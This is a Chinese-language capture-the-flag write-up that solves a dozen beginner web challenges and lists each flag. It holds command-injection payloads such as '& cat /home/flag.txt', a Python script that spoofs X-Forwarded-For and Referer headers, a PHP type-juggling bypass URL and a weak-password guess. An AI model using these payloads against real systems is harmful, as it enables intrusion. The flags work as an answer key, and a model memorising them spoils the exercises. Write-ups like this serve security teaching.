view_source

题目：

X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。

解题：

右键不能查看源代码，按F12可以查看

cyberpeace{89d32354e6376ff12dd808a69d7558ac}

get_post

题目：

X老师告诉小宁同学HTTP通常使用两种请求方法，你知道是哪两种吗？

请用GET方式提交一个名为a,值为1的变量

请再以POST方式随便提交一个名为b,值为2的变量

解题：

按题目要求提交就好了。

cyberpeace{a6ff180114397a553c4d15f402813cc8}

robots

题目：

X老师上课讲了Robots协议，小宁同学却上课打了瞌睡，赶紧来教教小宁Robots协议是什么吧。

解题：

访问http://111.198.29.45:48821/robots.txt，得到：

User-agent: *
Disallow: 
Disallow: f1ag_1s_h3re.php

访问f1ag_1s_h3re.php，得到：

cyberpeace{f7ad5ca7752f0149bf2158cc48d918f8}

backup

题目：

X老师忘记删除备份文件，他派小宁同学去把备份文件找出来,一起来帮小宁同学吧！

你知道index.php的备份文件名吗？

解题：

http://111.198.29.45:39595/index.php.bak

Cyberpeace{855A1C4B3401294CB6604CCC98BDE334}

cookie

题目：

X老师告诉小宁他在cookie里放了些东西，小宁疑惑地想：‘这是夹心饼干的意思吗？’

解题：

f12 查看cookie，可以看到

访问cookie.php，可以看到返回响应头中有flag

cyberpeace{2d4074c42377e599f3f6283dc7a04678}

disabled_button

题目：

X老师今天上课讲了前端知识，然后给了大家一个不能按的按钮，小宁惊奇地发现这个按钮按不下去，到底怎么才能按下去呢？

解题：

f12修改源代码，去掉disabled，点击得到flag

cyberpeace{b7bcbfd1b552cf5a17df39cbe2125807}

simple_js

题目：

小宁发现了一个网页，但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} )

解题：

一打开弹出输入密码，随便输一个，提示密码错误，右键查看源代码，审查一下js，写解密代码。

console.log("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30")
// 55,56,54,79,115,69,114,116,107,49,50
var r = '';
var pass = "55,56,54,79,115,69,114,116,107,49,50";
var tab2 = pass.split(',');
for (i = 0; i < tab2.length; i++) {
    r += String.fromCharCode(tab2[i])
}
console.log(r);
// 786OsErtk12

Cyberpeace{786OsErtk12}

xff_referer

题目：

X老师告诉小宁其实xff和referer是可以伪造的。

解题：

打开页面要求ip必须是123.123.123.123，ip设置好后提示必须来源于https://www.google.com

解题脚本：

import requests

url = 'http://111.198.29.45:32359/'
r = requests.get(url, headers={"X-Forwarded-For": "123.123.123.123", "referer": "https://www.google.com"})
r.encoding = 'utf-8'
print r.text

cyberpeace{14917748eeee2b0fe41373954e8580cf}

weak_auth

题目：

小宁写了一个登陆验证页面，随手就设了一个密码。

解题：

登录框，随手输入admin 123456就得到flag

cyberpeace{71506b96bbe5fb949d72dfad5a320925}

webshell

题目：

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

解题：

cyberpeace{4f7441f4902b487c346561bad66c714f}

command_execution

题目：

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的，你知道为什么吗。

解题：

使用符号 | ，||，&都可以实现一样的效果。

读取当前目录：

& ls

读取根目录

& ls /

读取home目录

& ls /home

读取flag

& cat /home/flag.txt

cyberpeace{c957a869304ebae85ae6c932787def55}

simple_php

题目：

小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。

解题：

代码审计题

<?php 
show_source(__FILE__); 
include("config.php"); 
$a=@$_GET['a']; 
$b=@$_GET['b']; 
if($a==0 and $a){ 
    echo $flag1; 
} 
if(is_numeric($b)){ 
    exit(); 
} 
if($b>1234){ 
    echo $flag2; 
} 
?>

利用0e为字符串，并等于0绕过a的限制，利用php数组和任何基本类型数据比较恒大的特性，绕过b的限制。

http://111.198.29.45:47381/?a=0e&b[]=1

Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}